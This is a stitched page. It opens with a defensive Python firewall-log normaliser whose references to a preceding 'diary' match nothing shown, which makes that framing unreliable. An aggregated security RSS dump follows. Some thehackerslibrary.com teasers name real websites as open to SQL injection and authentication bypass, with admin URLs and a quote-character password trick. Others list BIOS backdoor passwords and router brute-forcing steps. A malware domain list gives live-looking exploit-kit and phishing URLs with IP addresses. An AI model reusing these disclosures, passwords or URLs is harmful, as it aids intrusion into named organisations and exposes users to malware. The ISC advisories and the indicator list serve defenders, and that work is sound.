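As an added example (not code from the diary or from the CEE project), the normaliser below takes two constructed firewall log lines, a Linux netfilter LOG line and a line in an assumed tab-separated layout, and emits one JSON event per line using the label src.ipv4 that the diary mentions. The remaining labels (dst.ipv4, src.port, dst.port, proto, action, time), both input layouts and the shared key are illustrative assumptions, not CEE's actual field dictionary. It also seals each event with an HMAC-SHA256 tag so a collector can detect a tampered line, the integrity property the diary notes plain syslog lacks.

```python
"""Normalise two firewall log formats into one JSON event and seal it.

Added example for the diary above; not code from the ISC diary or the
CEE project. Only the label src.ipv4 is taken from the diary. The other
labels (dst.ipv4, src.port, dst.port, proto, action, time), both input
layouts and the shared key are assumptions made for illustration and are
not claimed to match CEE's actual field dictionary.
"""
import hashlib
import hmac
import ipaddress
import json
import re
from datetime import datetime, timezone

# Constructed sample input (not real traffic): a Linux netfilter LOG line
# written with --log-prefix "FW-DROP", and the same packet in an assumed
# tab-separated layout of: date time, src, srcport, dst, dstport, proto.
IPTABLES_LINE = (
    "Oct 19 10:15:32 fw1 kernel: FW-DROP IN=eth0 OUT= "
    "SRC=203.0.113.7 DST=198.51.100.10 LEN=60 TTL=51 PROTO=TCP "
    "SPT=51234 DPT=22 WINDOW=65535 SYN"
)
TAB_LINE = "2012-10-19 10:15:32\t203.0.113.7\t51234\t198.51.100.10\t22\tTCP"

_KV = re.compile(r"\b([A-Z]+)=(\S*)")
_PROTO_NUM = {"TCP": 6, "UDP": 17, "ICMP": 1}   # IANA protocol numbers


def _event(time_iso, action, proto, src, spt, dst, dpt):
    """Build the common record. IPv4Address() raises ValueError on a
    malformed address, so bad input fails here instead of entering the
    correlation store as a string nobody can match on."""
    ev = {
        "time": time_iso,
        "action": action,
        "proto": _PROTO_NUM.get(proto.upper(), proto),
        "src.ipv4": str(ipaddress.IPv4Address(src)),
        "dst.ipv4": str(ipaddress.IPv4Address(dst)),
    }
    if spt:
        ev["src.port"] = int(spt)
    if dpt:
        ev["dst.port"] = int(dpt)
    return ev


def parse_iptables(line, year=2012):
    """Netfilter LOG line via syslog; the timestamp has no year, so the
    caller supplies it. Text before the first KEY= pair is the log prefix."""
    head, _, rest = line.partition(" kernel: ")
    stamp = datetime.strptime(f"{year} {head[:15]}", "%Y %b %d %H:%M:%S")
    kv = dict(_KV.findall(rest))
    prefix = rest.split("IN=", 1)[0]
    action = "deny" if "DROP" in prefix.upper() else "log"
    return _event(stamp.replace(tzinfo=timezone.utc).isoformat(), action,
                  kv["PROTO"], kv["SRC"], kv.get("SPT"), kv["DST"], kv.get("DPT"))


def parse_tab(line):
    """Assumed tab layout that records only dropped packets."""
    stamp, src, spt, dst, dpt, proto = line.rstrip("\n").split("\t")
    t = datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
    return _event(t.isoformat(), "deny", proto, src, spt, dst, dpt)


def seal(event, key):
    """One JSON line carrying the event plus an HMAC-SHA256 tag over its
    canonical serialisation (sorted keys, no whitespace)."""
    body = json.dumps(event, sort_keys=True, separators=(",", ":"))
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return json.dumps({"event": event, "hmac": tag}, sort_keys=True)


def verify(line, key):
    """True only if the tag matches the event; any edited field fails the
    constant-time comparison."""
    rec = json.loads(line)
    body = json.dumps(rec["event"], sort_keys=True, separators=(",", ":"))
    want = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(want, str(rec.get("hmac", "")))


if __name__ == "__main__":
    key = b"assumed-shared-collector-key"   # assumption: provisioned out of band
    for ev in (parse_iptables(IPTABLES_LINE), parse_tab(TAB_LINE)):
        line = seal(ev, key)
        print(line, verify(line, key))
```

Both parsers funnel into one constructor, which is where the validation belongs: a source address that is not an IPv4 address is rejected before it can pollute the store. The HMAC tag proves only that whoever held the key produced the line, so it protects records in transit and at rest on the collector; it does nothing against an attacker who already controls the emitting host and therefore the key.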

==> ISC StormCast for Friday, October 19th 2012 http://isc.sans.edu/podcastdetail.html?id=2884, (Fri, Oct 19th)

http://isc.sans.org/rssfeed_full.xml

==> Another Java update! Java SE 1.6.0_37 Available ==> http://www.oracle.com/technetwork/java/javase/releasenotes-136954.html, (Thu, Oct 18th)

http://isc.sans.org/rssfeed_full.xml =============== Rob VandenBrink Metafore

==> ISC StormCast for Thursday, October 18th 2012 http://isc.sans.edu/podcastdetail.html?id=2881, (Thu, Oct 18th)

http://isc.sans.org/rssfeed_full.xml

==> Cyber Security Awareness Month - Day 17 - A Standard for Risk Management - ISO 27005, (Wed, Oct 17th)

http://isc.sans.org/rssfeed_full.xml A word that I'm hearing a lot these days from clients is Risk. And yes, it has a capital R. Every time. Folks tend to think of any risk as unacceptable to the business. Every change control form nowadays has Risk Assessment and Risk Remediation sections, and any issue that crops up that wasn't anticipated now becomes a process failure that needs to be addressed. Don't get me wrong, I'm all for some rigor in Risk Assessment, but every risk can't be an 11 on a scale of 1 to 10. Enter ISO/IEC 27005:2011 - Information technology - Security techniques - Information security risk management. ISO 27005 allows system administrators (change requestors) and managers (change approvers) to use a common approach and the same language, and to come to an agreement on risk. Most importantly, this helps parties like these come to an agreement quickly. If you've ever had a change approver who has trouble saying either yes or no, you'll understand why this is so important. This standard starts by defining a framework and a flowchart to manage risk (below). Like all good methodologies, there are decision points and iteration, so you'll need to ensure that you identify decision makers who will actually decide, or you'll never escape! Once inside the flowchart, I found that I was impressed with the emphasis on business and organizational language; this standard is written to get buy-in from management (this is a good thing). They've also got the obligatory section on qualitative and quantitative risk, but more importantly, in the appendices there is some clear direction on how to use both approaches. More importantly (in my books anyway), they have examples of taking a qualitative assessment and quantifying it, allowing you to apply numeric values to fuzzy situations.
This makes the job of the System Administrator easier when proposing a change: you can use this approach to assign actual values to things. The Risk Treatment section ensures that a final decision is made. Too often we see managers decide not to decide; following this standard ensures that everyone understands that this is not an option. There are a few choices to make, and yes, assuming the risk is a valid choice. When all the ducks are lined up and it's decision time, then a decision there will be! I can't cover every aspect of a 68-page standard in one page, but suffice to say that this one is well worth the purchase price. Yes, it's an ISO standard, so you'll have to buy it to use it. If you've got a risk management war story, or a comment on this post, please use our comment form; we'd love to hear from you! In SANS SEC579, we use the ISO 27005 methodology and apply it to the ENISA Cloud Risk document (see references below) to contrast the risks of Public and Private Cloud deployments to your organization.

References:
(2011). ISO/IEC 27005 - Information technology - Security techniques - Information security risk management (ISO/IEC 27005:2011). Geneva, Switzerland: International Standards Organization.
(2009). Cloud Computing: Benefits, risks and recommendations for information security. Crete, Greece: ENISA - European Network and Information Security Agency.

=============== Rob VandenBrink Metafore

==> Time to update - Java version 7 update 9 (JRE 7u9, JDK 7u9) is out! Release notes here - http://www.oracle.com/technetwork/java/javase/7u9-relnotes-1863279.html, (Wed, Oct 17th)

http://isc.sans.org/rssfeed_full.xml =============== Rob VandenBrink Metafore

==> New Acrobat release (including reader) available. Version 11. Some security improvements more here -->http://blogs.adobe.com/adobereader/, (Wed, Oct 17th)

http://isc.sans.org/rssfeed_full.xml

==> ISC StormCast for Wednesday, October 17th 2012 http://isc.sans.edu/podcastdetail.html?id=2878, (Wed, Oct 17th)

http://isc.sans.org/rssfeed_full.xml

==> Oracle Critical Patch Update October, (Wed, Oct 17th)

http://isc.sans.org/rssfeed_full.xml Oracle has just released their Critical Patch Update: http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html Quite a number of products are being patched. Also, for those of you subject to PCI DSS, there are a significant number of patches addressing issues with a CVSS score of 4 or higher, which must be patched under the standard. They have also released a Critical Patch Update for Java: http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html The info in the Oracle bulletin is comprehensive and should allow you to identify what needs to be done fairly easily. Both bulletins have the following wording in the workaround section: "Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply CPU fixes as soon as possible." For most of us this is not new (at least not on the Java side), but maybe a strong argument if you get pushback on patching. Happy patching; as always, test before you implement. Mark H - shearwater

==> BSNL- Dotsoft (Admin) Auth Bypass Vulnerability, calcuttatelephones.com Database Disclosure

http://www.thehackerslibrary.com/?feed=rss Profile: Dotsoft is in-house developed software integrating the Commercial Activities, Telecom Billing & Accounting, FRS and Directory Enquiry. It has been implemented in 171 SSAs (Districts) across the country. Company URL: http://dotsoft.bsnl.co.in/ Admin URL: http://dotsoft.bsnl.co.in/helpdesk/admin.asp Demo: http://www.flickr.com/photos/64621175@N03/5884121702/in/photostream http://www.flickr.com/photos/64621175@N03/5883556231/in/photostream Calcuttatelephones.com Database Disclosure, Directory Listing. http://www.calcuttatelephones.com Demo: http://www.flickr.com/photos/64621175@N03/5885441132/in/photostream Database containing 2600 plus records. phpMyAdmin SQL Dump version 2.5.7-pl1 [...]

==> Unlock Idea Net Setter – The Easiest Way

http://www.thehackerslibrary.com/?feed=rss In India, IDEA launched its Netsetter USB 3G modem for internet access. You can get up to 21 Mbps via this USB Net Setter. As I was watching people here fool others in the name of unlocking, to earn money, I thought why not educate our members. Netsetter is using a Hawai [...]

==> IGNOU website+Few other Sites – SQL Injection, Weak Authentication Vulnerabilities

http://www.thehackerslibrary.com/?feed=rss IGNOU currently serves approximately 3.8 million students in India and 40 countries abroad in twenty-one schools and a network of 59 regional centres, 7 sub-regional centres, 2600 study centres, and 52 overseas centres. The IGNOU website is vulnerable to SQL Injection and weak authentication. Some modules of the site www.ignou.ac.in have weak authentication, [...]

==> vsworld.com – SQL Injection Vulnerability

http://www.thehackerslibrary.com/?feed=rss vsworld – SQL Injection Vulnerability Profile: Developing solutions for areas as diverse as technology, trading, power, travel, education and retail. In addition, regularly called upon to cater to the requirements of prestigious Government Bodies. Various prestigious clients are in the client list. Vendor URL: http://www.vsworld.com/index.php Vulnerability Type: SQL Injection Vulnerable URL: http://www.vsworld.com/index.php/en/admin-login.html & http://www.vsworld.com/index.php => VSM Login [...]

==> Sandeep’s Commentry on the Linux Kernel – Part 1

http://www.thehackerslibrary.com/?feed=rss I will provide a hands-on guide to dissecting and learning the Linux kernel. But I am busy with work and so forth, and I may not be able to post regularly. I will however not spoon-feed, and will just be providing general guidelines. Also I will be covering the Linux [...]

==> Bom Sabado – A new orkut worm

http://www.thehackerslibrary.com/?feed=rss Bom Sabado means "happy Saturday" in English. It is a worm spread by some Brazilian group; in this article I'm going to share how it works and how to protect yourself from it. Hope you enjoy the article. In this attack, you get a scrap saying "bom sabado" and your account hangs; you joined [...]

==> Orkut Bug: Community Hacking

http://www.thehackerslibrary.com/?feed=rss There was a bug a few days ago in the new Orkut. Some big communities like Stanford were hacked back then. So here is the post on how it was hacked: The attacker transfers a dummy community to himself, then he starts capturing what data is sent during the transfer. For this the attacker uses a Firefox addon called [...]

==> SSL Hijacking

http://www.thehackerslibrary.com/?feed=rss It discusses the weakness in the SSL certificate signing request which gets exploited for making fake certificates. Finally, the article shows how to run the SSLStrip tool on Windows and hijack SSL successfully. What is SSLStrip? SSLStrip works by watching HTTP traffic, then acting as a proxy when a user attempts to [...]

==> Sikkim Manipal University portal can be hacked via SQL Injection

http://www.thehackerslibrary.com/?feed=rss About the university: Sikkim Manipal is one of the largest private universities in India. The institute attracts students from all over the country, with over 1700 students enrolled in the various engineering disciplines. 102 full-time faculty are employed. Type of problem: SQL Injection. Vulnerable Portal: http://portal.smude.edu.in/ User Name: sanjay (any name will do) Password: ‘ [...]

==> Future is Open Source…………………..NOT !

http://www.thehackerslibrary.com/?feed=rss We have been hearing for years that open source is the future of the world, that everything will be open source in the future, but I don't think it is possible in a logical way. I know I sound very strange and against the majority, but I know whatever point and example I am going to [...]

==> Heap Overflows: Ancient Art of Unlink Seduction

http://www.thehackerslibrary.com/?feed=rss Hi, here's an article which introduces the earlier techniques of heap overflows. I find that it is almost mandatory to understand these basic, albeit still useful, techniques. Dynamic Memory Allocation and the Heap: The data associated with a program in memory can be allocated to one of 3 areas: (a) the data segment for global data, [...]

==> Cracking Router Password

http://www.thehackerslibrary.com/?feed=rss In this tutorial we will use Brutus, but you can use any brute forcer. So download Brutus from the link below: http://www.hoobie.net/brutus/brutus-download.html Step 1: when we try to access our router it will ask for an id and password; we can try some of the default id/password pairs like admin:admin, admin:12345, etc. Step 2: now [...]

==> Google Hacking Part 2

http://www.thehackerslibrary.com/?feed=rss As in the first part, arbu posted about the basics of Google hacking; in this part I'm just going to put some of the basic, important Google dorks that a hacker uses. This article is only for educational purposes, so if anyone misuses it, that will not be my responsibility or this [...]

==> Code Classics

http://www.thehackerslibrary.com/?feed=rss A few anecdotes about code snippets that range from the craziest to the most elegant. Cryptic quote by Kawigi: double m[]= {7709179928849219.0, 771};int main(){m[1]--?m[0]*=2,main():printf(m);} This cryptic code, when run, outputs "C++ sucks". A Quine is a computer program which produces a copy of its own source code as its only output. main() { [...]

==> ARP Poisoning -ARP Spoofing :Info And Defense

http://www.thehackerslibrary.com/?feed=rss Article taken from: Sean Whalen (http://www.rootsecure.net/content/downloads/pdf/arp_spoofing_intro.pdf) This article is for educational purposes only; if someone misuses the information, the author or site admin is not responsible for it. Introduction: A computer connected to an IP/Ethernet LAN has two addresses. One is the address of the network card, called the MAC address. The MAC, in [...]

==> Cross Website Scripting(XSS) Info and Prevention

http://www.thehackerslibrary.com/?feed=rss So here I'm gonna write an article on XSS, aka cross-site scripting. Some declaration: this article is only meant for educational purposes; if someone uses it for the wrong purpose then THL is not responsible for it. Note: since THL will not show the codes, I modified them; now [...]

==> Restoring lost partitions using Ubuntu live CD

http://www.thehackerslibrary.com/?feed=rss FAQ: How do I restore my lost partition table? I accidentally deleted my partition table, how do I recover my data? How to recover deleted partitions and data in them? Recover data from deleted drives. WARNING: If you’ve formatted and/or added new data to the drive, or carried on with an OS installation, chances of [...]

==> DDoS Attacks and DDoS Defense Mechanisms

http://www.thehackerslibrary.com/?feed=rss Introduction: Distributed denial-of-service attacks (DDoS) pose an immense threat to the Internet, and consequently many defense mechanisms have been proposed to combat them. Attackers constantly modify their tools to bypass these security systems, and researchers in turn modify their approaches to handle new attacks. The DDoS field is evolving quickly, and it is becoming increasingly hard [...]

==> Unable To See Hidden Files

http://www.thehackerslibrary.com/?feed=rss We have probably all faced the problem that we cannot 'view hidden files', even after selecting the option from the Folder Options menu, and when we go back to check, we see that it has been mysteriously restored to 'Do Not Show Hidden Files & Folders'. It happens due to a small bug/virus which [...]

==> Practical Compiler Development Part 1

http://www.thehackerslibrary.com/?feed=rss Practical Compiler Development Tutorial Part 1. This is a rather informal introduction to the development of a hobby compiler. The more formal chapters on compiler development will be given in later tutorials. By the end of this tutorial you will be able to create a simple interpreter. This can be easily converted into [...]

==> Dynamic DLL Injection

http://www.thehackerslibrary.com/?feed=rss In my previous post I described static DLL injection. Now we will look at dynamic DLL injection, which is mostly used by Trojans. After a program has been executed, a process is created in the OS. When an attacker attempts to load code into the process memory space, the attacker [...]

==> Quantum Computing the new Horizon in Computing History

http://www.thehackerslibrary.com/?feed=rss The massive amount of processing power generated by computer manufacturers has not yet been able to quench our thirst for speed and computing capacity. In 1947, American computer engineer Howard Aiken said that just six electronic digital computers would satisfy the computing needs of the United States. Others have made similar errant predictions about the [...]

==> Semantic E-mail Delivery: The Future of E-mail?

http://www.thehackerslibrary.com/?feed=rss Smart email figures out who should get messages. new cutting edge technology? or just another waste of time? Perhaps you might discover a life-changing potential so stay tuned. A prototype e-mail system being tested at Stanford University later this year will radically change how users specify where their messages are supposed to be delivered. [...]

==> Spyware – A Threat To Your Privacy:Info and Defence

http://www.thehackerslibrary.com/?feed=rss What is spyware? Spyware is Internet jargon for advertising-supported software (adware). It is a way for shareware authors to make money from a product other than by selling it to the users. Technically it is software which spies on you: it spies on your music habits (just like Google is spying on your [...]

==> Buffer Over Flow Attack

http://www.thehackerslibrary.com/?feed=rss If you are reading this post then you definitely have some idea about computer programming and processes. A computer program executes various processes and goes on balancing the equations for which it has been created. In the new era of programming we generally see that companies recruit only those programmers who are efficient in programming. Now [...]

==> CAIN and ABEL Tutorial 4

http://www.thehackerslibrary.com/?feed=rss This will contain Network Enumerator Promiscuous-mode scanner Sniffer SQL Server 2000 Password Extractor Traceroute Network Enumerator The Network Enumerator uses the native Windows network management functions (Net*) to discover what is present on the network. It allows a quick identification of Domain Controllers, SQL Servers, Printer Servers, Remote Access Dial-In Servers, Novell Servers, Apple File [...]

==> Hotlinking and Bandwidth Theft

http://www.thehackerslibrary.com/?feed=rss The internet is growing at a pretty fast pace. We can also find bloggers, webmasters and website developers among ourselves these days. This is an important reason for me to write this post. Before proceeding, let me give a small introduction about what I have actually posted here. Introduction: Bandwidth theft does not mean cracking [...]

==> CAIN and ABEL Tutorial 3

http://www.thehackerslibrary.com/?feed=rss This part of the tutorial will contain Certificates Collector Cisco Config Downloader/Uploader Mac Scanner Certificates Collector Cain’s Certificates Collector grabs server certificates from HTTPS web sites and prepares them for APR-HTTPS. The feature is automatically used by the HTTPS sniffer filter but you can also use it manually to create a list of pre-calculated fake [...]

==> CAIN and ABEL Tutorial 2

http://www.thehackerslibrary.com/?feed=rss This part of the tutorial will cover: ARP Poison Routing APR-HTTPS APR APR (ARP Poison Routing) is a main feature of the program. It enables sniffing on switched networks and the hijacking of IP traffic between hosts. The name “ARP Poison Routing” derives from the two steps needed to perform such unusual network sniffing: an [...]

==> CAIN and ABEL Tutorial 1

http://www.thehackerslibrary.com/?feed=rss This tutorial will cover (version 4.9.8) INTRODUCTION Cain is an easy application to install and configure. However, there are several powerful tools that should only be configured after you fully understand both the capabilities and the consequences to the application and the target network. After all, you can't very well hack a network if you take [...]

==> The PE Format

http://www.thehackerslibrary.com/?feed=rss Warning: This document contains purely technical information. This can be considered as iron, out of which weapons can be made. Additionally, this is about 48 pages long and written by me. Introduction: Windows uses the Portable Executable Format to store executable files, also known as an "image" of an executable. Although the PE [...]

==> BandWidth Explained

http://www.thehackerslibrary.com/?feed=rss BandWidth Explained Most hosting companies offer a variety of bandwidth options in their plans. So exactly what is bandwidth as it relates to web hosting? Put simply, bandwidth is the amount of traffic that is allowed to occur between your web site and the rest of the internet. The amount of bandwidth a hosting company [...]

==> GMAIL Search Query

http://www.thehackerslibrary.com/?feed=rss Gmail Search Syntax: Gmail offers a rich search syntax for rooting through your email message archive. from: travels through the headers of your archive in search of mail sent by someone matching the keyword you provide, e.g. from:arbabusmani@gmail.com. to: finds all messages sent to someone matching a provided keyword (don't forget plus-addressing), e.g. to:usmani.arbab@yahoo.com or to:hacking+books@gmail.com. Match messages with [...]

==> Intrusion Detection Systems [IDS]

http://www.thehackerslibrary.com/?feed=rss An intrusion detection system (IDS) is a software- and/or hardware-based system that monitors network traffic for suspicious activity and alerts the system or network administrator when it detects an intrusion attempt from an external source into a private network. In some cases the IDS may also respond to anomalous or malicious traffic [...]

==> Google Hacking

http://www.thehackerslibrary.com/?feed=rss Use Google as a warez search engine, a.k.a. Get Free Stuff! 1. Go to www.google.com 2. In the search bar type in: “intitle:index of” and then type in the keyword for whatever you are looking for. So for example, if I want to find some Linkin Park songs I would type in this: “intitle:index of” LINKIN PARK (OR SONG [...]

==> Gmail Themes are here!!!

http://www.thehackerslibrary.com/?feed=rss Hi All, the themes for Gmail are here. Though there is no official word from Google or the Gmail team in the Google blog yet, a few people across the globe saw their Gmail with themes and a new tab saying Themes on the settings page. The settings page can be reached at http://mail.google.com/mail/#settings/themes and go to http://mail.google.com/support/bin/answer.py?hl=en&ctx=mail&answer=112508 for [...]

==> Practical Hashing

http://www.thehackerslibrary.com/?feed=rss This is my first blog here and this will be about cryptographic hash functions. I have chosen this as the topic for my first post as hashing functions are very common in the field of cryptography, which is an area of interest of mine. A hash function takes a string of bits or bytes as [...]

==> Some linux commands

http://www.thehackerslibrary.com/?feed=rss Starting & Stopping
shutdown -h now    Shut down the system now and do not reboot
halt               Stop all processes (same as above)
shutdown -r 5      Shut down the system in 5 minutes and reboot
shutdown -r now    Shut down the system now and reboot
reboot             Stop all processes and then reboot (same as above)
startx             Start [...]

==> GUI Toolkits compared

http://www.thehackerslibrary.com/?feed=rss GUI Toolkits Compared: I have worked with a few UI libraries during my college days (late-night hackwork!), although it has been months since I really coded something in C/C++. Here is my opinion on most of the UI frameworks (choices available). (a) Win32 API, GDI (user32.dll): This was the [...]

==> The New Era of Eavesdropping

http://www.thehackerslibrary.com/?feed=rss You all must have heard about keyloggers. You can log keystrokes using a keylogger running as a hidden background service on the victim's computer. Just imagine a case: you think your system is secure as it doesn't have any keylogger, you've thoroughly scanned the background services and there is no suspicious service running, as [...]

==> DNA Computing

http://www.thehackerslibrary.com/?feed=rss Silicon has been successful for years as a computing material. Almost every computer in the world has silicon in it. We probably can't imagine a computer without silicon. So what is special about it? The answer lies in its structure, which makes it a very special material for computers. But that is not our concern here. [...]

==> Port Scanning

http://www.thehackerslibrary.com/?feed=rss Port Scanning: Port scanning is the process of connecting to TCP and UDP ports on a target system to determine what services are running or in a LISTENING state. Identifying listening ports is critical to determining the type of operating system and applications in use. Active services that are listening may allow an unauthorized user [...]

==> BIOS Password Hack

http://www.thehackerslibrary.com/?feed=rss Standard BIOS backdoor passwords: The first, less invasive, attempt to bypass a BIOS password is to try one of these standard manufacturer's backdoor passwords: AWARD BIOS AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, [...]

==> Resetting Root Authorization in Linux and Prevention

http://www.thehackerslibrary.com/?feed=rss The root authentication can be reset to a NULL value with the following method. Do not use this information for committing cyber crimes. At the GRUB loader, highlight the desired kernel which you want to boot ('fedora core fc9'), press 'e' to edit the run levels and other options, then the second menu arrives as .. (hd0,1) [...]

==> Firefox v/s Chrome

http://www.thehackerslibrary.com/?feed=rss * Post Updated, Must Read * Google Chrome's release has kicked up a lot of dust in the internet world. Mozilla is feeling big pressure about that. However, Mozilla has not hit the panic button yet, because they released a number of benchmarks showing Firefox 3.1 will be faster than anything Google can muster with Chrome. Google claims [...]

==> How to Bypass Mandatory Free Registrations

http://www.thehackerslibrary.com/?feed=rss Do you really get annoyed when asked for FREE REGISTRATIONS by many websites, without which you cannot proceed further? Everyone who uses the internet regularly must have faced this and must know how annoying it is. Registering means you have to give your personal details, which can result in spam, promotional emails, identity theft etc. [...]

==> leprasmotra.ru:8080 (2012/10/18_16:20)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: leprasmotra.ru:8080/forum/links/column.php, IP address: 72.18.203.140, ASN: 26277, Country: US, Description: Blackhole exploit kit 2.0

==> img.greaterlife.us (2012/10/18_16:30)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: img.greaterlife.us/links/demands-lower.php, IP address: 93.170.128.219, ASN: 57494, Country: CZ, Description: Blackhole exploit kit 2.0

==> 199.71.212.114 (2012/10/18_16:30)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: -, IP address: 199.71.212.114/links//term_covering.php, ASN: 40676, Country: US, Description: Blackhole exploit kit 2.0

==> qroyooa.toh.info (2012/10/18_19:46)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: qroyooa.toh.info/links/fancy_wherever_divided.php, IP address: 91.121.139.49, ASN: 16276, Country: FR, Description: Blackhole exploit kit 2.0

==> widewayinc.com (2012/10/18_19:46)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: widewayinc.com/Web/replacement-based_destroy-varies.php, IP address: 149.47.156.172, ASN: 36444, Country: US, Description: Blackhole exploit kit 2.0

==> sdbi.my03.com (2012/10/18_19:46)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: sdbi.my03.com/external/expression-games-affected.php, IP address: 188.165.95.15, ASN: 16276, Country: FR, Description: Blackhole exploit kit 2.0

==> bigfatcowboy.com (2012/10/18_19:46)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: bigfatcowboy.com/links/term_covering.php, IP address: 173.246.100.236, ASN: 29169, Country: US, Description: Blackhole exploit kit 2.0

==> 74.91.121.247 (2012/10/17_15:40)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: -, IP address: 74.91.121.247/links/assure_numb_engineers.php, ASN: 14745, Country: US, Description: Blackhole exploit kit 2.0

==> 129.121.130.156 (2012/10/17_15:40)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: -, IP address: 129.121.130.156/Url/links/deemed_registers.php, ASN: 36444, Country: US, Description: Blackhole exploit kit 2.0

==> kennedyana.ru:8080 (2012/10/17_15:40)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: kennedyana.ru:8080/forum/links/column.php, IP address: 203.80.16.81, ASN: 24514, Country: MY, Description: Blackhole exploit kit 2.0

==> hotsecrete.net (2012/10/16_16:08)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: hotsecrete.net/detects/exclude-offices_details_warm.php, IP address: 183.81.133.121, ASN: 38442, Country: FJ, Description: Blackhole exploit kit 2.0

==> bakface.ru:8080 (2012/10/16_16:17)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: bakface.ru:8080/forum/links/column.php, IP address: 203.80.16.81, ASN: 24514, Country: MY, Description: Blackhole exploit kit 2.0

==> security-safety-account.de.vc (2012/10/16_16:20)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: security-safety-account.de.vc/, IP address: 188.40.70.27, ASN: 24940, Country: DE, Description: iframe leads to Facebook phishing

==> restorehelprecovery.indonesian-hacker.net (2012/10/16_16:20)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: restorehelprecovery.indonesian-hacker.net/, IP address: 31.170.166.61, ASN: 47583, Country: US, Description: Facebook phishing

==> 2.bajawinery.com (2012/10/16_19:39)


==> Advance Announcement: 2011 ACM Cloud Computing Security Workshop (CCSW) is back!

http://www.infosecnews.org/isn.rss InfoSec News: Advance Announcement: 2011 ACM Cloud Computing Security Workshop (CCSW) is back!: Forwarded from: noreply (at) crypto.cs.stonybrook.edu 2011 ACM Cloud Computing Security Workshop (CCSW) at CCS, October 21, 2011, SWISSOTEL Chicago http://crypto.cs.stonybrook.edu/ccsw11 Dear Colleagues, CCSW is back! The past workshops were a tremendous success, with over [...]

==> Unfollowed: How a (Possible) Social Network Spy Came Undone

http://www.infosecnews.org/isn.rss InfoSec News: Unfollowed: How a (Possible) Social Network Spy Came Undone: http://www.wired.com/dangerroom/2011/04/unfollowed-how-a-possible-social-network-spy-came-undone/ [When the early information about this story was coming out, it was that @PrimorisEra might have been spotting and assessing targets for a KGB honey pot operation. [...]

==> US-Russian dictionary defines cyber war, other concepts

http://www.infosecnews.org/isn.rss InfoSec News: US-Russian dictionary defines cyber war, other concepts: http://gcn.com/articles/2011/04/28/us-russia-cyber-dictionary.aspx By William Jackson GCN.com April 28, 2011 It is all very well to talk about cyberspace and cybersecurity, but what do they mean, exactly? A U.S.-Russian effort is proposing common definitions. [...]

==> ICANN taps DefCon founder for top security spot

http://www.infosecnews.org/isn.rss InfoSec News: ICANN taps DefCon founder for top security spot: http://www.v3.co.uk/v3-uk/news/2046681/icann-taps-defcon-founder-security-spot By Shaun Nichols V3.co.uk 29 Apr 2011 The Internet Corporation for Assigned Names and Numbers (ICANN) has named Jeff Moss as its new chief security officer. A security expert and respected member of the hacking community, Moss is best known for his roles in founding the DefCon and Black Hat security conferences. He has also worked in advisory positions for the US Department of Homeland Security. The appointment of Moss will bring to ICANN a security head who is well-versed in the attitudes and techniques which have driven research in both security intrusions and detections in recent years. The hiring also comes at a time when ICANN and other internet governance groups are working to roll out security measures such as DNSSEC. [...]

==> Teacher Passwords Stolen, Grades Hacked At 3 Seattle High Schools

http://www.infosecnews.org/isn.rss InfoSec News: Teacher Passwords Stolen, Grades Hacked At 3 Seattle High Schools: http://www.kirotv.com/education/27708043/detail.html By kirotv.com Webstaff April 28, 2011 SEATTLE -- Someone has stolen teacher passwords and changed grades in a Seattle Public Schools computer system, the district said in an email to teachers obtained Thursday by KIRO 7 Eyewitness News. [...]

==> Cyberespionage: US finds FBI agents in elite unit lack necessary skills

http://www.infosecnews.org/isn.rss InfoSec News: Cyberespionage: US finds FBI agents in elite unit lack necessary skills: Forwarded from: Justin Lundy <jbl (at) tegataiphoenix.com> http://www.csmonitor.com/USA/2011/0427/Cyberespionage-US-finds-FBI-agents-in-elite-unit-lack-necessary-skills By Mark Clayton Staff writer The Christian Science Monitor April 27, 2011 Many of the Federal Bureau of Investigation's field agents assigned to an elite cyber investigative unit lack the skills needed to investigate cases of cyberespionage and other computerized attacks on the US, the Justice Department inspector general reported Wednesday. That's a problem because the US is under constant and increasing cyberattack with 5,499 known intrusions into US government computer systems in 2008 alone -- a 40 percent jump from 2007, the inspector general's office found. Investigating these kinds of cyberespionage attacks falls largely on the FBI as the lead agency for the National Cyber Investigative Joint Task force, which also includes representatives from 18 different intelligence agencies and is assigned to investigate the most difficult national security intrusions -- those by a foreign power for intelligence gathering or terrorist purposes. But in interviews with 36 field agents in 10 of the FBI's 56 field offices nationwide, 13 agents, or more than a third, "reported that they lacked the networking and counterintelligence expertise to investigate national security [computer] intrusion cases." Five of the agents told investigators "they did not think they were able or qualified" to investigate such cases, the report said. The inspector general report does not indicate whether the 36 field agents who were interviewed are a representative sampling of the FBI’s cyber unit. [...]

==> Experts dissect hacker attacks during cybersecurity forum at Hagerstown Community College

http://www.infosecnews.org/isn.rss InfoSec News: Experts dissect hacker attacks during cybersecurity forum at Hagerstown Community College: http://www.herald-mail.com/news/local/hm-cyber-experts-dissect-hacker-attacks-during-cybersecurity-forum-at-hagerstown-community-college-20110427,0,2996601.story By ANDREW SCHOTZ herald-mail.com April 27, 2011 Experts Wednesday detailed simple and complex ways to protect computers [...]

==> Are we talking "cyber war" like the Bush admin talked WMDs?

